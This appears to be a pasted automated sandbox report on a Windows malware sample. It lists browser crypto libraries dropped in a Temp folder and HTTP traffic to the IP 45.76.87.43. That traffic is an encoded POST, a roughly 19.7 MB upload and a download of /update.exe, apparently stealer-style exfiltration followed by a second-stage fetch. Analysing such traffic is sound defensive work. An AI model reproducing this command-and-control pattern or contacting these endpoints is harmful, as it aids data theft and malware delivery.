- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nUlIMci5lDcC.exe"
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- * Domains:
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
- "uri": "http://45.76.87.43/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "45.76.87.43",
- "version": "1.1",
- "path": "/index.php",
- "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: 45.76.87.43\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://45.76.87.43/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "45.76.87.43",
- "version": "1.1",
- "path": "/index.php",
- "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: 45.76.87.43\r\nContent-Length: 19699671\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://45.76.87.43/update.exe",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "GET",
- "host": "45.76.87.43",
- "version": "1.1",
- "path": "/update.exe",
- "data": "GET /update.exe HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: 45.76.87.43\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "Germany",
- "ip": "45.76.87.43",
- "inaddrarpa": "",
- "hostname": ""
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement